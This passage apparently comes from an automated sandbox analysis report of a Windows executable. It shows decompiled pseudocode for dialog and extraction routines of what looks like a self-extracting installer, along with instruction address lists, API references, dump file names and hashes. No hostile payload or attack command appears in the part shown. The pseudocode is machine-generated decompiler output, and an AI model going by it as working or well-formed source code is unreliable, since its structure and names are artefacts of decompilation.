																			goto L99;
																		}
																		__eflags = _t420 - 5;
																		if(_t420 == 5) {
																			goto L83;
																		}
																		_t606 =  *(_t708 - 0xd);
																		_t702 =  *(_t708 - 0x18);
																		__eflags = _t606;
																		if(_t606 == 0) {
																			goto L96;
																		}
																		__eflags = _t702 - _t676;
																		if(_t702 == _t676) {
																			goto L93;
																		}
																		_t523 =  *(_t689 + 8);
																		__eflags =  *((char*)(_t523 + 0x6201));
																		if( *((char*)(_t523 + 0x6201)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t708 - 0x11)) = 0;
																		_t526 = E0016A180(_t689 + 0x10f8);
																		__eflags = _t526;
																		if(_t526 == 0) {
																			L81:
																			__eflags =  *((char*)(_t708 - 0x11));
																			if( *((char*)(_t708 - 0x11)) == 0) {
																				_t606 =  *(_t708 - 0xd);
																				goto L93;
																			}
																			L82:
																			_t606 = 0;
																			 *(_t708 - 0xd) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t708 - 0x11));
																		if( *((char*)(_t708 - 0x11)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t578 + 0x32c0);
																		_t161 = _t708 - 0x11; // 0x7ef
																		E00169377(0,  *(_t689 + 8), 0, _t689 + 0x10f8, 0x800, _t161,  *(_t578 + 0x32e0),  *(_t578 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t578 + 0x3341));
																	if( *((char*)(_t578 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t133 = _t708 - 0x28; // 0x7d8
																	_t534 = E0017FDFA(_t578 + 0x3342, _t133, 8);
																	_t710 = _t712 + 0xc;
																	__eflags = _t534;
																	if(_t534 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t578 + 0x6cc4);
																	if( *(_t578 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t689 + 0x10f6));
																	_t137 = _t708 - 0x113c; // -2364
																	_push(_t578 + 0x24);
																	if(__eflags != 0) {
																		_push(6);
																		E00161F94(__eflags);
																		E00166FC6(0x1a0f50, 0xb);
																		__eflags = 0;
																		 *(_t708 - 0xd) = 0;
																		goto L73;
																	}
																	_push(0x80);
																	E00161F94(__eflags);
																	E0016EB27( *(_t689 + 8) + 0x5024);
																	 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																	_t142 = _t708 - 0x13c; // 0x6c4
																	L0016EAB4(_t142);
																}
															}
															E00166FC6(0x1a0f50, 2);
															_t546 = E00161EDA(_t578);
															__eflags =  *((char*)(_t578 + 0x6cb4));
															_t395 = _t546 & 0xffffff00 |  *((char*)(_t578 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t101 = _t708 - 0x219c; // -6556
														_t548 = E00167D45(_t101, _t578 + 0x32c0);
														__eflags = _t548;
														if(_t548 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t708 - 0x21a0));
														if( *((char*)(_t708 - 0x21a0)) == 0) {
															L59:
															 *(_t708 - 0xd) = 0;
															goto L61;
														}
														_t103 = _t708 - 0x219c; // -6556
														_t550 = E00167D27(_t103, _t689);
														__eflags = _t550;
														if(_t550 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t699 - _t674;
													if(_t699 != _t674) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t400 + 0x6158));
												if( *((char*)(_t400 + 0x6158)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t689 + 0x10f8);
											if( *(_t689 + 0x10f8) == 0) {
												goto L50;
											}
											 *(_t708 - 0xd) = 1;
											__eflags =  *(_t578 + 0x3318);
											if( *(_t578 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t699 - _t389;
										_t390 = 1;
										if(_t699 != _t389) {
											goto L46;
										}
										goto L45;
									}
									_t677 =  *((intOrPtr*)(_t578 + 0x6cb4));
									 *(_t708 - 0xe) = _t677;
									 *(_t708 - 0x24) = _t677;
									__eflags = _t677;
									if(_t677 == 0) {
										goto L214;
									} else {
										_t673 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t689 + 0xec) -  *((intOrPtr*)(_t581 + 0xa334));
								if( *(_t689 + 0xec) <  *((intOrPtr*)(_t581 + 0xa334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t689 + 0xf1));
								if( *((char*)(_t689 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t578 + 0x32e0) = _t672;
								 *(_t578 + 0x32e4) = _t672;
								goto L26;
							}
							__eflags =  *(_t578 + 0x32e0) - _t672;
							if( *(_t578 + 0x32e0) >= _t672) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t578 + 0x32d8) = _t672;
							 *(_t578 + 0x32dc) = _t672;
							goto L22;
						}
						__eflags =  *(_t578 + 0x32d8) - _t672;
						if( *(_t578 + 0x32d8) >= _t672) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t696 - 3;
					if(_t696 != 3) {
						L10:
						__eflags = _t696 - 5;
						if(_t696 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t578 + 0x45ac));
						if( *((char*)(_t578 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t708 - 0x18));
						_push(0);
						_push(_t689 + 0x10);
						_push(_t578);
						_t567 = E001784BD(_t672);
						__eflags = _t567;
						if(_t567 != 0) {
							__eflags = 0;
							 *0x193260( *((intOrPtr*)(_t578 + 0x6ca0)),  *((intOrPtr*)(_t578 + 0x6ca4)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t578 + 0x10))))();
							goto L15;
						} else {
							E00166FC6(0x1a0f50, 1);
							goto L219;
						}
					}
					__eflags =  *(_t689 + 0x10f7);
					if( *(_t689 + 0x10f7) == 0) {
						goto L217;
					} else {
						E00167B66(_t578, _t708,  *(_t689 + 8), _t578, _t689 + 0x10f8);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t689 + 0x5f)) == 0) {
					L4:
					_t395 = 0;
					goto L17;
				}
				_push(_t371);
				_push(0);
				_push(_t689 + 0x10);
				_push(_t578);
				if(E001784BD(0) != 0) {
					_t672 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00166FC6(0x1a0f50, 1);
					goto L4;
				}
			}

0x0016857b
0x00168580
0x0016858a
0x00168590
0x00168593
0x00168596
0x00168598
0x0016859e
0x001685a5
0x001685ab
0x001685d7
0x001685d8
0x001685de
0x001685e1
0x0016867a
0x00168680
0x00168686
0x0016869e
0x0016869e
0x001686a4
0x001686bc
0x001686bc
0x001686bf
0x001686c5
0x001686e2
0x001686e7
0x001686eb
0x001686f5
0x00168700
0x00168705
0x00168707
0x0016870a
0x0016870d
0x0016870f
0x00168711
0x00168715
0x00168717
0x00168719
0x00168719
0x00168715
0x00168721
0x00168726
0x00168727
0x00168734
0x00168735
0x0016873d
0x00168744
0x00168747
0x0016879e
0x001687a3
0x001687a5
0x001687a7
0x001687ad
0x001687b3
0x001687b7
0x001687b7
0x001687b7
0x001687b7
0x00168749
0x0016874c
0x00168752
0x00168754
0x00168756
0x0016875a
0x0016875c
0x00168763
0x00168768
0x00168769
0x00168770
0x00168775
0x0016877f
0x00168781
0x00168797
0x00168783
0x00168785
0x0016878c
0x0016878e
0x0016878e
0x00168781
0x0016875a
0x00168754
0x001687c0
0x001687c5
0x001687dd
0x001687e8
0x001687f0
0x001687f3
0x001687f5
0x001687f9
0x001687fc
0x001687ff
0x00168802
0x0016881a
0x0016881d
0x00168822
0x00168828
0x00168829
0x0016882b
0x00168834
0x00168834
0x00168836
0x00168839
0x00168843
0x0016884a
0x0016884f
0x00168851
0x0016921d
0x0016921d
0x00168667
0x00168668
0x0016866d
0x00168677
0x00168677
0x00168857
0x00168865
0x00168868
0x00168870
0x00168877
0x0016887a
0x00168891
0x00168891
0x00168894
0x00168894
0x00168899
0x0016889c
0x001688a3
0x001688a4
0x001688a7
0x001688aa
0x001688b5
0x001688b5
0x001688b8
0x001688bf
0x001688bf
0x001688c5
0x001688cc
0x001688cd
0x001688db
0x001688e0
0x001688e2
0x0016891a
0x0016891d
0x00168929
0x00168929
0x00168929
0x0016892c
0x0016892c
0x00168936
0x0016893b
0x0016893d
0x00168961
0x00168961
0x00168968
0x00000000
0x00000000
0x0016896a
0x00168974
0x00168979
0x0016897b
0x00168a5d
0x00000000
0x00168a5d
0x00168981
0x00168984
0x0016898c
0x00168992
0x00168993
0x00168993
0x00168995
0x0016899e
0x001689a1
0x001689ad
0x001689c0
0x001689ca
0x001689dc
0x001689e1
0x001689e8
0x00168a81
0x00168a81
0x00168a85
0x00168a8b
0x00168a90
0x00168a96
0x00168a9b
0x00168aa1
0x00168aa8
0x00168aad
0x00168aae
0x00168ab0
0x00168b43
0x00168b45
0x00168b4a
0x00168b4c
0x00168b9e
0x00168ba1
0x00168ba3
0x00168bc7
0x00168bca
0x00168bca
0x00168bd1
0x00168c09
0x00168c0b
0x001691d2
0x001691d2
0x001691d6
0x001691dc
0x001691e1
0x001691e5
0x001691e8
0x001691eb
0x001691ed
0x001691ed
0x001691ed
0x001691ed
0x001691f3
0x001691f3
0x001691f7
0x00000000
0x00000000
0x001691f9
0x001691fb
0x00168665
0x00168665
0x00000000
0x00168665
0x00169201
0x00169207
0x00169215
0x00169217
0x00000000
0x00000000
0x00000000
0x00169217
0x00169209
0x0016920b
0x00000000
0x0016920b
0x00168c11
0x00168c11
0x00168c14
0x00168c1b
0x00168c2d
0x00168c2d
0x00168c30
0x00168c32
0x00168c79
0x00168c79
0x00168c7d
0x00168c7f
0x00168c87
0x00168c87
0x00168c9b
0x00168ca1
0x00168ca7
0x00168cad
0x00168cbe
0x00168cd4
0x00168cdf
0x00168ce8
0x00168ceb
0x00168cf2
0x00168cf8
0x00168cfd
0x00168d00
0x00168d02
0x00168d05
0x00168d08
0x00168d0b
0x00168d0e
0x00168d11
0x00168d13
0x00168db6
0x00168db6
0x00168db9
0x00168dc0
0x00168dc7
0x00168dcb
0x00168de1
0x00168de3
0x00168de3
0x00168de4
0x00168de4
0x00168de8
0x00168deb
0x00168dee
0x00168df1
0x00168efd
0x00168f04
0x00168f06
0x00168f0d
0x00168f37
0x00168f3c
0x00168f4e
0x00168f54
0x00168f56
0x00168f5c
0x00168f76
0x00168f0f
0x00168f0f
0x00168f15
0x00168f1b
0x00168f1c
0x00168f1c
0x00168f0d
0x00168f7b
0x00168f7d
0x00168f82
0x00168f89
0x00168fbb
0x00168fbb
0x00168fbb
0x00168fbd
0x00168fbf
0x00168fbf
0x00168fc6
0x00168fd0
0x00168fd7
0x00168ff6
0x00168ff6
0x00168ffa
0x00168ffd
0x0016905e
0x0016905e
0x00169062
0x00169065
0x00169078
0x00169078
0x00169078
0x0016907a
0x0016907a
0x0016907e
0x00000000
0x00000000
0x00169084
0x00169087
0x0016908b
0x00169097
0x00169097
0x0016909b
0x001690b6
0x001690b6
0x001690b8
0x001690cd
0x001690cd
0x001690cf
0x00169193
0x00169193
0x00169196
0x0016919d
0x001691a5
0x001691ac
0x001691b1
0x001691b3
0x001691c6
0x001691c6
0x001691b3
0x001691cb
0x00000000
0x001691cb
0x001690d5
0x001690da
0x001690dc
0x001690df
0x001690e5
0x001690e5
0x001690e7
0x001690f9
0x001690f9
0x001690ff
0x00169104
0x00169107
0x0016910d
0x00169121
0x00169128
0x0016913b
0x0016913d
0x00169146
0x0016914b
0x00169151
0x00169160
0x00169173
0x00169186
0x00169188
0x0016918b
0x00169190
0x00000000
0x00169190
0x001690e9
0x001690ef
0x00000000
0x00000000
0x001690f1
0x001690f7
0x00000000
0x00000000
0x00000000
0x001690f7
0x001690e1
0x001690e3
0x00000000
0x00000000
0x00000000
0x001690e3
0x001690ba
0x001690bd
0x001690c4
0x00000000
0x00000000
0x001690ca
0x00000000
0x001690ca
0x0016909d
0x0016909f
0x00000000
0x00000000
0x001690a1
0x001690a8
0x00000000
0x00000000
0x001690ae
0x001690b0
0x00000000
0x00000000
0x00000000
0x001690b0
0x0016908d
0x00169091
0x00000000
0x00000000
0x00000000
0x00169091
0x00169067
0x0016906e
0x00000000
0x00000000
0x00169070
0x00169072
0x00000000
0x00000000
0x00169074
0x00000000
0x00169074
0x00168fff
0x00169003
0x00000000
0x00000000
0x00169005
0x00169007
0x00000000
0x00000000
0x00169009
0x0016900f
0x00169039
0x00169039
0x00169043
0x00169044
0x00169046
0x00169046
0x00169052
0x00169056
0x0016905b
0x00000000
0x0016905b
0x00169011
0x00169017
0x00169021
0x00169021
0x00169028
0x00000000
0x00000000
0x0016902a
0x00169034
0x00169035
0x00000000
0x00169035
0x00169019
0x0016901f
0x00000000
0x00000000
0x00000000
0x0016901f
0x00168fd9
0x00168fdf
0x00000000
0x00000000
0x00168fe1
0x00168feb
0x00168feb
0x00168fed
0x00168fef
0x00168fef
0x00000000
0x00168fed
0x00168fe3
0x00168fe9
0x00000000
0x00000000
0x00000000
0x00168fe9
0x00168fc8
0x00000000
0x00168fc8
0x00168fa0
0x00168fac
0x00168fb1
0x00168fb3
0x00000000
0x00000000
0x00168fb5
0x00168fb7
0x00000000
0x00168fb7
0x00168df7
0x00168dfd
0x00168e00
0x00168e69
0x00168e69
0x00168e6e
0x00168e7f
0x00168e84
0x00168e87
0x00168e89
0x00168ed6
0x00168ed6
0x00168ed9
0x00168ed9
0x00168ee0
0x00168e35
0x00168e35
0x00168e37
0x00168ef3
0x00168ef3
0x00168ef3
0x00168ef5
0x00168ef5
0x00000000
0x00168ef5
0x00168e3d
0x00168e3d
0x00168e3f
0x00000000
0x00000000
0x00168e47
0x00000000
0x00168e47
0x00168ee6
0x00168ee8
0x00000000
0x00000000
0x00168e31
0x00168e31
0x00000000
0x00168e31
0x00168e8b
0x00168e93
0x00000000
0x00000000
0x00168e95
0x00168e9b
0x00168ea7
0x00168ea8
0x00168eab
0x00168eb9
0x00168eba
0x00168ec1
0x00168ead
0x00168ead
0x00168ead
0x00168ec6
0x00168ec6
0x00168ec9
0x00168ecb
0x00168e2e
0x00168e2e
0x00000000
0x00168e2e
0x00168ed1
0x00000000
0x00168ed1
0x00168e02
0x00168e05
0x00000000
0x00000000
0x00168e07
0x00168e09
0x00168e4d
0x00168e4d
0x00168e4f
0x00000000
0x00000000
0x00168e5b
0x00168e62
0x00000000
0x00168e62
0x00168e0b
0x00168e0e
0x00000000
0x00000000
0x00168e10
0x00168e13
0x00000000
0x00000000
0x00168e22
0x00168e27
0x00168e29
0x00168e2b
0x00000000
0x00168e2b
0x00168dcd
0x00168dcf
0x00000000
0x00000000
0x00168dd3
0x00168dd4
0x00168dd8
0x00000000
0x00000000
0x00168ddc
0x00168ddd
0x00000000
0x00168ddd
0x00168d19
0x00168d1f
0x00000000
0x00000000
0x00168d25
0x00168d2b
0x00168d31
0x00168d33
0x00168db3
0x00168db3
0x00000000
0x00168db3
0x00168d35
0x00168d3f
0x00168d3f
0x00168d4f
0x00168d52
0x00168d54
0x00168dae
0x00168dae
0x00168db1
0x00168db1
0x00000000
0x00168db1
0x00168d56
0x00168d5c
0x00168d5e
0x00168d60
0x00168d85
0x00168d8b
0x00168d97
0x00168da2
0x00168dab
0x00000000
0x00168dab
0x00168d62
0x00168d6c
0x00168d6e
0x00168d73
0x00168d79
0x00000000
0x00000000
0x00168d7b
0x00000000
0x00000000
0x00168d7d
0x00168d83
0x00000000
0x00000000
0x00000000
0x00168d83
0x00168d64
0x00168d6a
0x00000000
0x00000000
0x00000000
0x00168d6a
0x00168d58
0x00168d5a
0x00000000
0x00000000
0x00000000
0x00168d5a
0x00168d37
0x00168d3d
0x00000000
0x00000000
0x00000000
0x00168d3d
0x00168c81
0x00168c81
0x00168c81
0x00168c81
0x00000000
0x00168c81
0x00168c38
0x00168c3b
0x00168c3c
0x00168c3f
0x00168c41
0x00168c4c
0x00168c4e
0x00168c5d
0x00168c6f
0x00168c6f
0x00168c4e
0x00000000
0x00168c3f
0x00168c1d
0x00168c24
0x00168c2b
0x00168c76
0x00000000
0x00168c76
0x00000000
0x00168c2b
0x00168bd7
0x00168bda
0x00168be1
0x00168be8
0x00168bed
0x00168bef
0x00000000
0x00000000
0x00168bf1
0x00168bf3
0x00168bf6
0x00168bf6
0x00168bfc
0x00168c01
0x00000000
0x00168c01
0x00168ba5
0x00168bae
0x00168baf
0x00168bb4
0x00168bb7
0x00168bb9
0x00168bc1
0x00168bc1
0x00168bc3
0x00000000
0x00000000
0x00000000
0x00168bc5
0x00168b4e
0x00168b52
0x00168b58
0x00168b5b
0x00168b5f
0x00168b67
0x00168b68
0x00168b6b
0x00168b73
0x00168b74
0x00168b77
0x00168b79
0x00168b7f
0x00168b85
0x00168b87
0x00168b8d
0x00168b94
0x00168b97
0x00168b97
0x00168b85
0x00168b77
0x00168b6b
0x00168b5f
0x00000000
0x00168b52
0x00168ab6
0x00168ab9
0x00000000
0x00000000
0x00168abf
0x00168ac2
0x00168ac5
0x00168ac7
0x00000000
0x00000000
0x00168acd
0x00168ad0
0x00000000
0x00000000
0x00168ad6
0x00168ad9
0x00168ae0
0x00000000
0x00000000
0x00168ae8
0x00168af2
0x00168af7
0x00168af9
0x00168b30
0x00168b30
0x00168b34
0x00168bbe
0x00000000
0x00168bbe
0x00168b3a
0x00168b3c
0x00168b3e
0x00000000
0x00168b3e
0x00168afb
0x00168aff
0x00000000
0x00000000
0x00168b01
0x00168b09
0x00168b0a
0x00168b11
0x00168b2b
0x00000000
0x00168b2b
0x001689ee
0x001689f5
0x00000000
0x00000000
0x001689fd
0x00168a08
0x00168a0d
0x00168a10
0x00168a12
0x00000000
0x00000000
0x00168a14
0x00168a1b
0x00000000
0x00000000
0x00168a1d
0x00168a24
0x00168a2e
0x00168a2f
0x00168a69
0x00168a6b
0x00168a77
0x00168a7c
0x00168a7e
0x00000000
0x00168a7e
0x00168a31
0x00168a36
0x00168a44
0x00168a49
0x00168a4d
0x00168a53
0x00168a53
0x00168961
0x00168946
0x0016894d
0x00168952
0x00168959
0x00000000
0x00168959
0x001688eb
0x001688f1
0x001688f6
0x001688f8
0x00000000
0x00000000
0x001688fa
0x00168901
0x00168913
0x00168915
0x00000000
0x00168915
0x00168904
0x0016890a
0x0016890f
0x00168911
0x00000000
0x00000000
0x00000000
0x00168911
0x001688ba
0x001688bd
0x00000000
0x00000000
0x00000000
0x001688bd
0x001688ac
0x001688b3
0x00000000
0x00000000
0x00000000
0x001688b3
0x0016887c
0x00168883
0x00000000
0x00000000
0x00168885
0x00168889
0x0016888f
0x00000000
0x00000000
0x00000000
0x0016888f
0x0016882d
0x00168830
0x00168832
0x00000000
0x00000000
0x00000000
0x00168832
0x00168804
0x0016880a
0x0016880d
0x00168810
0x00168812
0x00000000
0x00168818
0x00168818
0x00168818
0x00000000
0x00168818
0x00168812
0x001686cd
0x001686d3
0x00000000
0x00000000
0x001686d5
0x001686dc
0x00000000
0x00000000
0x00000000
0x001686dc
0x001686a6
0x001686b0
0x001686b0
0x001686b6
0x00000000
0x001686b6
0x001686a8
0x001686ae
0x00000000
0x00000000
0x00000000
0x001686ae
0x00168688
0x00168692
0x00168692
0x00168698
0x00000000
0x00168698
0x0016868a
0x00168690
0x00000000
0x00000000
0x00000000
0x00168690
0x001685e7
0x001685ea
0x00168609
0x00168609
0x0016860c
0x00000000
0x00000000
0x00168612
0x00168619
0x00000000
0x00000000
0x00168624
0x00168625
0x00168629
0x0016862a
0x0016862b
0x00168630
0x00168632
0x00168647
0x0016865b
0x00168663
0x00000000
0x00168634
0x0016863b
0x00000000
0x0016863b
0x00168632
0x001685ec
0x001685f3
0x00000000
0x001685f9
0x00168604
0x00000000
0x00168604
0x001685f3
0x001685b0
0x001685ce
0x001685ce
0x00000000
0x001685ce
0x001685b2
0x001685b3
0x001685b7
0x001685b8
0x001685c0
0x001685d5
0x001685d5
0x00000000
0x001685c2
0x001685c9
0x00000000
0x001685c9

APIs

__EH_prolog.LIBCMT ref: 00168580
_memcmp.LIBVCRUNTIME ref: 00168A08

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: ad081abe1fb43844120063cfa20abc6b762cc057a77968f24414d5cb9df09c5e
Instruction ID: f1f65e3a3a1d302d1e7c5b2b2f7239f8bd3b417b107dfcf957d5705355718251
Opcode Fuzzy Hash: ad081abe1fb43844120063cfa20abc6b762cc057a77968f24414d5cb9df09c5e
Instruction Fuzzy Hash: 86824C70904245AFDF25DF74CC95BFAB7B9AF15300F0842BAEC59AB142DB315A68CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0017F063, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017F063() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0017F070); // executed
				return _t1;
			}

0x0017f068
0x0017f06e

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001F070,0017EAC5), ref: 0017F068

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 91016d3275ca21a4e57193df59dbb7c43dd05711403b1aa9a4511a8d1265cea5
Instruction ID: f257324f3c7481525d3f9369e284a9f05aa61aa3187f894c6ebded180d759e3d
Opcode Fuzzy Hash: 91016d3275ca21a4e57193df59dbb7c43dd05711403b1aa9a4511a8d1265cea5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0017AEE0, Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0017AEE0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				void* _t166;
				int _t169;
				void* _t182;
				void* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				int _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t256;
				WCHAR* _t257;
				int _t261;
				int _t263;
				void* _t268;
				void* _t272;
				signed short _t277;
				int _t279;
				WCHAR* _t288;
				WCHAR* _t290;
				intOrPtr _t292;
				void* _t301;
				int _t302;
				struct HWND__* _t304;
				intOrPtr _t307;
				void* _t308;
				struct HWND__* _t309;
				void* _t311;
				struct HWND__* _t313;
				long _t314;
				struct HWND__* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;

				_t301 = __edx;
				_t287 = __ecx;
				E0017E28C(E0019203E, _t320);
				E0017E360();
				_t277 =  *(_t320 + 0x10);
				_t307 =  *((intOrPtr*)(_t320 + 0xc));
				_t304 =  *(_t320 + 8);
				if(E0016130B(_t301, _t304, _t307, _t277,  *((intOrPtr*)(_t320 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t308 = _t307 - 0x110;
					__eflags = _t308;
					if(__eflags == 0) {
						_push(_t304);
						E0017CD2E(_t287, _t301, __eflags, __fp0);
						_t105 =  *0x1ac574;
						_t279 = 1;
						 *0x1a844c = _t304;
						 *0x1a8458 = _t304;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t304, 0x80, 1, _t105); // executed
						}
						_t106 =  *0x1b6b7c;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t304, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t304, 0x68);
						 *(_t320 - 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00179DA4(_t320 - 0x1174, 0x800);
						_t111 = GetDlgItem(_t304, 0x66);
						__eflags =  *0x1aa472;
						_t309 = _t111;
						 *(_t320 - 0x18) = _t309;
						_t288 = 0x1aa472;
						if( *0x1aa472 == 0) {
							_t288 = _t320 - 0x1174;
						}
						SetWindowTextW(_t309, _t288);
						E0017A2C7(_t309); // executed
						_push(0x1a843c);
						_push(0x1a8438);
						_push(0x1bdc90);
						_push(_t304);
						 *0x1a8463 = 0; // executed
						_t114 = E0017A7C3(_t288, _t301, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0x1a8452 = _t279;
						}
						__eflags =  *0x1a843c;
						if( *0x1a843c > 0) {
							_push(7);
							_push( *0x1a8438);
							_push(_t304);
							E0017BDF5(_t301);
						}
						__eflags =  *0x1bec98;
						if( *0x1bec98 == 0) {
							SetDlgItemTextW(_t304, 0x6b, E0016DDD1(_t288, 0xbf));
							SetDlgItemTextW(_t304, _t279, E0016DDD1(_t288, 0xbe));
						}
						__eflags =  *0x1a843c;
						if( *0x1a843c <= 0) {
							L103:
							__eflags =  *0x1a8463;
							if( *0x1a8463 != 0) {
								L114:
								__eflags =  *0x1aa46c - 2;
								if( *0x1aa46c == 2) {
									EnableWindow(_t309, 0);
								}
								__eflags =  *0x1a9468;
								if( *0x1a9468 != 0) {
									E001612C8(_t304, 0x67, 0);
									E001612C8(_t304, 0x66, 0);
								}
								_t115 =  *0x1aa46c;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0x1a8450;
									if( *0x1a8450 == 0) {
										_push(0);
										_push(_t279);
										_push(0x111);
										_push(_t304);
										__eflags = _t115 - _t279;
										if(_t115 != _t279) {
											 *0x1c20a4();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x1a8452;
								if( *0x1a8452 != 0) {
									SetDlgItemTextW(_t304, _t279, E0016DDD1(_t288, 0x90));
								}
								goto L125;
							}
							__eflags =  *0x1bdc84;
							if( *0x1bdc84 != 0) {
								goto L114;
							}
							__eflags =  *0x1aa46c;
							if( *0x1aa46c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t311 = 0xaa;
							 *((short*)(_t320 - 0x969c)) = 0;
							do {
								__eflags = _t311 - 0xaa;
								if(_t311 != 0xaa) {
									L109:
									__eflags = _t311 - 0xab;
									if(__eflags != 0) {
										L111:
										E0016FE2E(__eflags, _t320 - 0x969c, " ", 0x2000);
										E0016FE2E(__eflags, _t320 - 0x969c, E0016DDD1(_t288, _t311), 0x2000);
										goto L112;
									}
									__eflags =  *0x1bec98;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0x1bec98;
								if( *0x1bec98 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t311 = _t311 + 1;
								__eflags = _t311 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0x1a8440; // 0x0
							E00179635(_t288, __eflags,  *0x1a0ed4,  *(_t320 - 0x14), _t320 - 0x969c, 0, 0);
							_t309 =  *(_t320 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0x1a8438);
							_push(_t304); // executed
							E0017BDF5(_t301); // executed
							_t133 =  *0x1bdc84;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0x1aa46c;
								if(__eflags == 0) {
									_t290 =  *0x1a8440; // 0x0
									E00179635(_t290, __eflags,  *0x1a0ed4,  *(_t320 - 0x14), _t133, 0, 0);
									L001835CE( *0x1bdc84);
									_pop(_t288);
								}
							}
							__eflags =  *0x1aa46c - _t279;
							if( *0x1aa46c == _t279) {
								L102:
								_push(_t279);
								_push( *0x1a8438);
								_push(_t304);
								E0017BDF5(_t301);
								goto L103;
							} else {
								 *0x1c20c4(_t304);
								__eflags =  *0x1aa46c - _t279;
								if( *0x1aa46c == _t279) {
									goto L102;
								}
								__eflags =  *0x1aa471;
								if( *0x1aa471 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0x1a8438);
								_push(_t304);
								E0017BDF5(_t301);
								__eflags =  *0x1bec90;
								if( *0x1bec90 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0x1a0ed4, L"LICENSEDLG", 0, E0017ACD0, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0x1a8450 = _t279;
									L26:
									_push(_t279);
									L13:
									EndDialog(_t304, ??); // executed
									L125:
									_t116 = _t279;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t308 != 1;
					if(_t308 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t277 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0x1a8451;
						if( *0x1a8451 != 0) {
							L23:
							GetDlgItemTextW(_t304, 0x66, _t320 - 0x2174, 0x800);
